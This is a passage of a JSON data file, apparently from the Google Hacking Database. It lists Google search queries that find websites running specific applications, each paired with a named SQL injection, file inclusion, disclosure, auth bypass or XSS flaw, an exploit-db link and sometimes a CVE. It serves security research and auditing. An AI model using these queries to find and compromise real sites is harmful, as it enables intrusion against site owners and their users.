http://www.exploit-db.com/exploits/15075" }, { "signatureReferenceNumber": "1755", "link": "https://www.exploit-db.com/ghdb/1755/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+UCStats+version+1.1%22", "shortDescription": "\"Powered by UCStats version 1.1\"", "textualDescription": "UCStats v1.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10891" }, { "signatureReferenceNumber": "1756", "link": "https://www.exploit-db.com/ghdb/1756/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+CCLeague+Pro%22", "shortDescription": "\"Powered by CCLeague Pro\"", "textualDescription": "CCLeague Pro 1.2 Insecure Cookie Authentication Vulnerability - CVE: 2008-5123: http://www.exploit-db.com/exploits/5888" }, { "signatureReferenceNumber": "1757", "link": "https://www.exploit-db.com/ghdb/1757/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:Bilder+Galerie+1.1+or+intitle:Bilder+Galerie", "shortDescription": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "textualDescription": "MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability - CVE: 2007-6649: http://www.exploit-db.com/exploits/4815" }, { "signatureReferenceNumber": "1758", "link": "https://www.exploit-db.com/ghdb/1758/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by:+PostGuestbook+0.6.1%22", "shortDescription": "\"Powered by: PostGuestbook 0.6.1\"", "textualDescription": "PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability - CVE: 2007-1372: http://www.exploit-db.com/exploits/3423" }, { "signatureReferenceNumber": "1759", "link": "https://www.exploit-db.com/ghdb/1759/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+sunshop%22", "shortDescription": "\"powered by sunshop\"", "textualDescription": "SunShop Shopping Cart 3.5 (abs_path) RFI Vulnerabilities - CVE: 2007-2070: http://www.exploit-db.com/exploits/3748" }, { "signatureReferenceNumber": "1760", "link": "https://www.exploit-db.com/ghdb/1760/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22SQuery+4.5%22+|%22SQuery+4.0%22+|%22SQuery+3.9%22+|+inurl:%22modules.php%3Fname%3DSQuery%22", "shortDescription": "\"SQuery 4.5\" |\"SQuery 4.0\" |\"SQuery 3.9\" | inurl:\"modules.php?name=SQuery\"", "textualDescription": "SQuery 4.5 (gore.php) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/2003" }, { "signatureReferenceNumber": "1761", "link": "https://www.exploit-db.com/ghdb/1761/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+SkaDate+Dating", "shortDescription": "Powered by SkaDate Dating", "textualDescription": "SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability - CVE: 2007-5299: http://www.exploit-db.com/exploits/4493" }, { "signatureReferenceNumber": "1762", "link": "https://www.exploit-db.com/ghdb/1762/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22ibase+site:de%22", "shortDescription": "inurl:\"ibase site:de\"", "textualDescription": "ibase 2.03 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-6288: http://www.exploit-db.com/exploits/6126" }, { "signatureReferenceNumber": "1763", "link": "https://www.exploit-db.com/ghdb/1763/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+sNews%22", "shortDescription": "\"Powered by sNews\"", "textualDescription": "sNews v1.7 (index.php?category) SQL Injection Vulnerability - CVE: 2010-2926: http://www.exploit-db.com/exploits/14465" }, { "signatureReferenceNumber": "1764", "link": "https://www.exploit-db.com/ghdb/1764/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Gravy+Media%22", "shortDescription": "\"Powered by Gravy Media\"", "textualDescription": "Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability - CVE: 2009-2184: http://www.exploit-db.com/exploits/8996" }, { "signatureReferenceNumber": "1765", "link": "https://www.exploit-db.com/ghdb/1765/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_djiceshoutbox%22", "shortDescription": "inurl:\"index.php?option=com_djiceshoutbox\"", "textualDescription": "Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability: http://www.exploit-db.com/exploits/8197" }, { "signatureReferenceNumber": "1766", "link": "https://www.exploit-db.com/ghdb/1766/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_filiale", "shortDescription": "inurl:com_filiale", "textualDescription": "Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability - CVE: 2008-1935: http://www.exploit-db.com/exploits/5488" }, { "signatureReferenceNumber": "1767", "link": "https://www.exploit-db.com/ghdb/1767/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+AV+Arcade%22", "shortDescription": "\"Powered By AV Arcade\"", "textualDescription": "AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability - CVE: 2007-3563: http://www.exploit-db.com/exploits/4138" }, { "signatureReferenceNumber": "1768", "link": "https://www.exploit-db.com/ghdb/1768/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+NATTERCHAT+v+1.1", "shortDescription": "Powered by NATTERCHAT v 1.1", "textualDescription": "NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: http://www.exploit-db.com/exploits/7172" }, { "signatureReferenceNumber": "1769", "link": "https://www.exploit-db.com/ghdb/1769/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=ogrencimezunlar.php", "shortDescription": "ogrencimezunlar.php", "textualDescription": "Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/3012" }, { "signatureReferenceNumber": "1770", "link": "https://www.exploit-db.com/ghdb/1770/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_yanc+%22listid%22", "shortDescription": "inurl:index.php?option=com_yanc \"listid\"", "textualDescription": "Joomla Component com_yanc SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11603" }, { "signatureReferenceNumber": "1771", "link": "https://www.exploit-db.com/ghdb/1771/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+6rbScript", "shortDescription": "Powered by 6rbScript", "textualDescription": "6rbScript (news.php newsid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5663" }, { "signatureReferenceNumber": "1772", "link": "https://www.exploit-db.com/ghdb/1772/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+vpasp+v+6.50", "shortDescription": "powered by vpasp v 6.50", "textualDescription": "VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability - CVE: 2008-5929: http://www.exploit-db.com/exploits/7438" }, { "signatureReferenceNumber": "1773", "link": "https://www.exploit-db.com/ghdb/1773/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22/questcms/%22", "shortDescription": "allinurl:\"/questcms/\"", "textualDescription": "QuestCMS (main.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2137" }, { "signatureReferenceNumber": "1774", "link": "https://www.exploit-db.com/ghdb/1774/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_eQuotes", "shortDescription": "inurl:com_eQuotes", "textualDescription": "Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability - CVE: 2008-2628: http://www.exploit-db.com/exploits/5723" }, { "signatureReferenceNumber": "1775", "link": "https://www.exploit-db.com/ghdb/1775/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Upload+unique+IP+List:%22+AND+%22The+Ultimate+Fake+Hit+Generator+-+BOOST+YOUR+ALEXA+RANK%22", "shortDescription": "\"Upload unique IP List:\" AND \"The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK\"", "textualDescription": "Fake Hit Generator 2.2 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10230" }, { "signatureReferenceNumber": "1776", "link": "https://www.exploit-db.com/ghdb/1776/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Xplode+CMS%22", "shortDescription": "\"Powered by Xplode CMS\"", "textualDescription": "Xplode CMS (wrap_script) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8373" }, { "signatureReferenceNumber": "1779", "link": "https://www.exploit-db.com/ghdb/1779/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Jewelry+Cart+Software", "shortDescription": "Powered by Jewelry Cart Software", "textualDescription": "Jewelry Cart Software (product.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11826" }, { "signatureReferenceNumber": "1780", "link": "https://www.exploit-db.com/ghdb/1780/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Dise%C3%B1o+Web+Hernest+Consulting+S.L.%22", "shortDescription": "\"Dise\u00f1o Web Hernest Consulting S.L.\"", "textualDescription": "Administrador de Contenidos Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/12527" }, { "signatureReferenceNumber": "1783", "link": "https://www.exploit-db.com/ghdb/1783/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_cpg", "shortDescription": "inurl:com_cpg", "textualDescription": "Mambo CopperminePhotoGalery Component Remote Include Vulnerability - CVE: 2006-4321: http://www.exploit-db.com/exploits/2196" }, { "signatureReferenceNumber": "1784", "link": "https://www.exploit-db.com/ghdb/1784/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:ratelink.php%3Flnkid%3D", "shortDescription": "inurl:ratelink.php?lnkid=", "textualDescription": "Link Trader (lnkid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10834" }, { "signatureReferenceNumber": "1785", "link": "https://www.exploit-db.com/ghdb/1785/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22CNStats+2.9%22", "shortDescription": "\"CNStats 2.9\"", "textualDescription": "CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability - CVE: 2007-2086: http://www.exploit-db.com/exploits/3741" }, { "signatureReferenceNumber": "1786", "link": "https://www.exploit-db.com/ghdb/1786/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Browse+with+Interactive+Map%22", "shortDescription": "\"Browse with Interactive Map\"", "textualDescription": "PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability - CVE: 2007-6462: http://www.exploit-db.com/exploits/4737" }, { "signatureReferenceNumber": "1789", "link": "https://www.exploit-db.com/ghdb/1789/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+By+Azaronline.com%22", "shortDescription": "intext:\"Powered By Azaronline.com\"", "textualDescription": "Azaronline Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15391" }, { "signatureReferenceNumber": "1790", "link": "https://www.exploit-db.com/ghdb/1790/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+ephpscripts", "shortDescription": "Powered by ephpscripts", "textualDescription": "E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln - CVE: 2008-5838: http://www.exploit-db.com/exploits/6398" }, { "signatureReferenceNumber": "1791", "link": "https://www.exploit-db.com/ghdb/1791/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+Blog+System%22", "shortDescription": "\"powered by Blog System\"", "textualDescription": "Blog System 1.x (note) SQL Injection Vuln - CVE: 2010-0458: http://www.exploit-db.com/exploits/11216" }, { "signatureReferenceNumber": "1792", "link": "https://www.exploit-db.com/ghdb/1792/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+DWdirectory%22", "shortDescription": "\"Powered by DWdirectory\"", "textualDescription": "DWdirectory 2.1 Remote SQL Injection Vulnerability - CVE: 2007-6392: http://www.exploit-db.com/exploits/4708" }, { "signatureReferenceNumber": "1793", "link": "https://www.exploit-db.com/ghdb/1793/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%222005++www.frank-karau.de%22+|+%222006++www.frank-karau.de%22", "shortDescription": "\"2005 www.frank-karau.de\" | \"2006 www.frank-karau.de\"", "textualDescription": "GL-SH Deaf Forum 6.4.4 Local File Inclusion Vulnerabilities - CVE: 2007-3535: http://www.exploit-db.com/exploits/4124" }, { "signatureReferenceNumber": "1796", "link": "https://www.exploit-db.com/ghdb/1796/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:jgs_treffen.php", "shortDescription": "inurl:jgs_treffen.php", "textualDescription": "Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability - CVE: 2008-1640: http://www.exploit-db.com/exploits/5329" }, { "signatureReferenceNumber": "1797", "link": "https://www.exploit-db.com/ghdb/1797/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+SoftbizScripts%22+inurl:%22searchresult.php%3Fsbcat_id%3D%22", "shortDescription": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "textualDescription": "Softbiz Recipes Portal Script Remote SQL Injection Vulnerability - CVE: 2007-5449: http://www.exploit-db.com/exploits/4527" }, { "signatureReferenceNumber": "1798", "link": "https://www.exploit-db.com/ghdb/1798/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+SNETWORKS+PHP+CLASSIFIEDS", "shortDescription": "Powered by SNETWORKS PHP CLASSIFIEDS", "textualDescription": "SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability - CVE: 2008-0137: http://www.exploit-db.com/exploits/4838" }, { "signatureReferenceNumber": "1799", "link": "https://www.exploit-db.com/ghdb/1799/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:Editor/assetmanager/assetmanager.asp", "shortDescription": "inurl:Editor/assetmanager/assetmanager.asp", "textualDescription": "Asset Manager Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12693" }, { "signatureReferenceNumber": "1800", "link": "https://www.exploit-db.com/ghdb/1800/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:makaledetay.asp%3Fid%3D", "shortDescription": "inurl:makaledetay.asp?id=", "textualDescription": "Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14420" }, { "signatureReferenceNumber": "1802", "link": "https://www.exploit-db.com/ghdb/1802/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22ir/addlink.php%3Fid%3D%22+OR+inurl:%22addlink.php%3Fid%3D%22", "shortDescription": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "textualDescription": "list Web (addlink.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10838" }, { "signatureReferenceNumber": "1803", "link": "https://www.exploit-db.com/ghdb/1803/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:+Powered+by+Traidnt+UP+Version+1.0.", "shortDescription": "inurl: Powered by Traidnt UP Version 1.0.", "textualDescription": "Traidnt UP Version 1.0 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/8006" }, { "signatureReferenceNumber": "1806", "link": "https://www.exploit-db.com/ghdb/1806/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_linkr%22", "shortDescription": "inurl:\"com_linkr\"", "textualDescription": "Joomla Component com_linkr - Local File Inclusion: http://www.exploit-db.com/exploits/11756" }, { "signatureReferenceNumber": "1807", "link": "https://www.exploit-db.com/ghdb/1807/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_janews%22", "shortDescription": "inurl:\"com_janews\"", "textualDescription": "Joomla Component com_janews - Local File Inclusion - CVE: 2010-1219: http://www.exploit-db.com/exploits/11757" }, { "signatureReferenceNumber": "1808", "link": "https://www.exploit-db.com/ghdb/1808/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_sectionex%22", "shortDescription": "inurl:\"com_sectionex\"", "textualDescription": "Joomla Component com_sectionex - Local File Inclusion: http://www.exploit-db.com/exploits/11759" }, { "signatureReferenceNumber": "1809", "link": "https://www.exploit-db.com/ghdb/1809/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_rokdownloads%22", "shortDescription": "inurl:\"com_rokdownloads\"", "textualDescription": "Joomla Component com_rokdownloads - Local File Inclusion - CVE: 2010-1056: http://www.exploit-db.com/exploits/11760" }, { "signatureReferenceNumber": "1810", "link": "https://www.exploit-db.com/ghdb/1810/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_ganalytics%22", "shortDescription": "inurl:\"com_ganalytics\"", "textualDescription": "Joomla Component com_ganalytics - Local File Inclusion: http://www.exploit-db.com/exploits/11758" }, { "signatureReferenceNumber": "1811", "link": "https://www.exploit-db.com/ghdb/1811/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/phpfootball/", "shortDescription": "inurl:/phpfootball/", "textualDescription": "PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability - CVE: 2007-0638: http://www.exploit-db.com/exploits/3226" }, { "signatureReferenceNumber": "1812", "link": "https://www.exploit-db.com/ghdb/1812/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Search+Adult+Directory:%22", "shortDescription": "\"Search Adult Directory:\"", "textualDescription": "Adult Directory (cat_id) Remote SQL Injection Vulnerability - CVE: 2007-4056: http://www.exploit-db.com/exploits/4238" }, { "signatureReferenceNumber": "1813", "link": "https://www.exploit-db.com/ghdb/1813/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:forum_answer.php%3Fque_id", "shortDescription": "inurl:forum_answer.php?que_id", "textualDescription": "AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14986" }, { "signatureReferenceNumber": "1814", "link": "https://www.exploit-db.com/ghdb/1814/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:index.php%3Fact%3Dpubl", "shortDescription": "allinurl:index.php?act=publ", "textualDescription": "Qwerty CMS (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8104" }, { "signatureReferenceNumber": "1815", "link": "https://www.exploit-db.com/ghdb/1815/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_cartweberp%22", "shortDescription": "inurl:\"com_cartweberp\"", "textualDescription": "Joomla Component com_cartweberp LFI Vulnerability - CVE: 2010-0982: http://www.exploit-db.com/exploits/10942" }, { "signatureReferenceNumber": "1816", "link": "https://www.exploit-db.com/ghdb/1816/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22PHPAuction+GPL+Enhanced+V2.51+by+AuctionCode.com%22", "shortDescription": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "textualDescription": "Auction_Software Script Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/14247" }, { "signatureReferenceNumber": "1817", "link": "https://www.exploit-db.com/ghdb/1817/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_doqment", "shortDescription": "inurl:com_doqment", "textualDescription": "Joomla Component com_doqment (cid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10965" }, { "signatureReferenceNumber": "1818", "link": "https://www.exploit-db.com/ghdb/1818/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:PHPhotoalbum+v0.5", "shortDescription": "intext:PHPhotoalbum v0.5", "textualDescription": "PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2501: http://www.exploit-db.com/exploits/5683" }, { "signatureReferenceNumber": "1819", "link": "https://www.exploit-db.com/ghdb/1819/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+OnePound%22", "shortDescription": "\"Powered by OnePound\"", "textualDescription": "onepound shop 1.x products.php SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9138" }, { "signatureReferenceNumber": "1823", "link": "https://www.exploit-db.com/ghdb/1823/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+:+Yamamah+Version+1.00%22", "shortDescription": "\"Powered By : Yamamah Version 1.00\"", "textualDescription": "Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability - CVE: 2010-2334: http://www.exploit-db.com/exploits/13856" }, { "signatureReferenceNumber": "1825", "link": "https://www.exploit-db.com/ghdb/1825/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+SnoGrafx%22", "shortDescription": "\"powered by SnoGrafx\"", "textualDescription": "SnoGrafx (cat.php?cat) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14523" }, { "signatureReferenceNumber": "1826", "link": "https://www.exploit-db.com/ghdb/1826/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22xGb.php%22", "shortDescription": "allinurl:\"xGb.php\"", "textualDescription": "xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability - CVE: 2007-4637: http://www.exploit-db.com/exploits/4336" }, { "signatureReferenceNumber": "1827", "link": "https://www.exploit-db.com/ghdb/1827/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ForumApp%22", "shortDescription": "\"Powered by ForumApp\"", "textualDescription": "ForumApp 3.3 Remote Database Disclosure Vulnerability - CVE: 2008-6147: http://www.exploit-db.com/exploits/7599" }, { "signatureReferenceNumber": "1828", "link": "https://www.exploit-db.com/ghdb/1828/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/component/jeeventcalendar/", "shortDescription": "inurl:/component/jeeventcalendar/", "textualDescription": "Joomla JE Event Calendar LFI Vulnerability: http://www.exploit-db.com/exploits/14062" }, { "signatureReferenceNumber": "1829", "link": "https://www.exploit-db.com/ghdb/1829/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+page_id+album+%22photo%22", "shortDescription": "allinurl: page_id album \"photo\"", "textualDescription": "Wordpress Photo album Remote SQL Injection Vulnerability - CVE: 2008-0939: http://www.exploit-db.com/exploits/5135" }, { "signatureReferenceNumber": "1830", "link": "https://www.exploit-db.com/ghdb/1830/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+beamospetition+1.0.12%22", "shortDescription": "\"Powered by beamospetition 1.0.12\"", "textualDescription": "Joomla Component beamospetition 1.0.12 SQL Injection / XSS - CVE: 2009-0378: http://www.exploit-db.com/exploits/7847" }, { "signatureReferenceNumber": "1831", "link": "https://www.exploit-db.com/ghdb/1831/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+68kb%22", "shortDescription": "\"Powered by 68kb\"", "textualDescription": "68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection: http://www.exploit-db.com/exploits/11925" }, { "signatureReferenceNumber": "1832", "link": "https://www.exploit-db.com/ghdb/1832/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22powered+and+designed+by+Dow+Group%22", "shortDescription": "intext:\"powered and designed by Dow Group\"", "textualDescription": "Dow Group (new.php) SQL Injection: http://www.exploit-db.com/exploits/9491" }, { "signatureReferenceNumber": "1833", "link": "https://www.exploit-db.com/ghdb/1833/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+devalcms+v1.4.a%22", "shortDescription": "\"powered by devalcms v1.4.a\"", "textualDescription": "devalcms 1.4a XSS / Remote Code Execution - CVE: 2008-6982: http://www.exploit-db.com/exploits/6369" }, { "signatureReferenceNumber": "1834", "link": "https://www.exploit-db.com/ghdb/1834/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_webring", "shortDescription": "inurl:com_webring", "textualDescription": "Joomla Webring Component 1.0 Remote Include Vulnerability - CVE: 2006-4129: http://www.exploit-db.com/exploits/2177" }, { "signatureReferenceNumber": "1835", "link": "https://www.exploit-db.com/ghdb/1835/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:hikaye.asp%3Fid%3D", "shortDescription": "inurl:hikaye.asp?id=", "textualDescription": "Caner Hikaye Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14419" }, { "signatureReferenceNumber": "1837", "link": "https://www.exploit-db.com/ghdb/1837/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:Design+by:+runt+communications", "shortDescription": "intext:Design by: runt communications", "textualDescription": "runt-communications Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12707" }, { "signatureReferenceNumber": "1838", "link": "https://www.exploit-db.com/ghdb/1838/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Copyright+Agares+Media+phpautovideo", "shortDescription": "Copyright Agares Media phpautovideo", "textualDescription": "phpAutoVideo CSRF Vulnerability - OSVDB-ID: 62450: http://www.exploit-db.com/exploits/11502" }, { "signatureReferenceNumber": "1840", "link": "https://www.exploit-db.com/ghdb/1840/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+DVHome.cn%22", "shortDescription": "\"Powered by DVHome.cn\"", "textualDescription": "PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability - CVE: 2007-2544: http://www.exploit-db.com/exploits/3854" }, { "signatureReferenceNumber": "1842", "link": "https://www.exploit-db.com/ghdb/1842/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22powered+by+Milonic%22+inurl:viewnews.php%3Fid%3D", "shortDescription": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "textualDescription": "Milonic News (viewnews) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11031" }, { "signatureReferenceNumber": "1843", "link": "https://www.exploit-db.com/ghdb/1843/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+ExtCalendar+v2%22", "shortDescription": "\"powered by ExtCalendar v2\"", "textualDescription": "com_extcalendar Mambo Component 2.0 Include Vulnerability: http://www.exploit-db.com/exploits/2022" }, { "signatureReferenceNumber": "1845", "link": "https://www.exploit-db.com/ghdb/1845/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Search+|+Invite+|+Mail+|+Blog+|+Forum%22", "shortDescription": "\"Search | Invite | Mail | Blog | Forum\"", "textualDescription": "Myspace Clone Script (index.php) Remote File Inclusion Vulnerability - CVE: 2007-6057: http://www.exploit-db.com/exploits/4628" }, { "signatureReferenceNumber": "1846", "link": "https://www.exploit-db.com/ghdb/1846/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22AcmlmBoard+v1.A2%22", "shortDescription": "\"AcmlmBoard v1.A2\"", "textualDescription": "AcmlmBoard 1.A2 (pow) Remote SQL Injection Vulnerability - CVE: 2008-5198: http://www.exploit-db.com/exploits/5969" }, { "signatureReferenceNumber": "1847", "link": "https://www.exploit-db.com/ghdb/1847/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_mambads", "shortDescription": "inurl:index.php?option=com_mambads", "textualDescription": "Mambo Component com_mambads SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11719" }, { "signatureReferenceNumber": "1848", "link": "https://www.exploit-db.com/ghdb/1848/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22modules.php%3Fname%3DMy_eGallery%22", "shortDescription": "inurl:\"modules.php?name=My_eGallery\"", "textualDescription": "PHP-Nuke My_eGallery 2.7.9 Remote SQL Injection Vulnerability - CVE: 2008-7038: http://www.exploit-db.com/exploits/5203" }, { "signatureReferenceNumber": "1850", "link": "https://www.exploit-db.com/ghdb/1850/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Marketplace+Version+1.1.1%22", "shortDescription": "\"Marketplace Version 1.1.1\"", "textualDescription": "Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability - CVE: 2008-0689: http://www.exploit-db.com/exploits/5055" }, { "signatureReferenceNumber": "1852", "link": "https://www.exploit-db.com/ghdb/1852/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Ajax+Portal+3.0%22", "shortDescription": "\"Powered by Ajax Portal 3.0\"", "textualDescription": "MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5653: http://www.exploit-db.com/exploits/7044" }, { "signatureReferenceNumber": "1853", "link": "https://www.exploit-db.com/ghdb/1853/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+IP.Board+3.0.0+Beta+5%22", "shortDescription": "\"Powered By IP.Board 3.0.0 Beta 5\"", "textualDescription": "Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns: http://www.exploit-db.com/exploits/8538" }, { "signatureReferenceNumber": "1854", "link": "https://www.exploit-db.com/ghdb/1854/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22MunzurSoft+Wep+Portal+W3%22", "shortDescription": "\"MunzurSoft Wep Portal W3\"", "textualDescription": 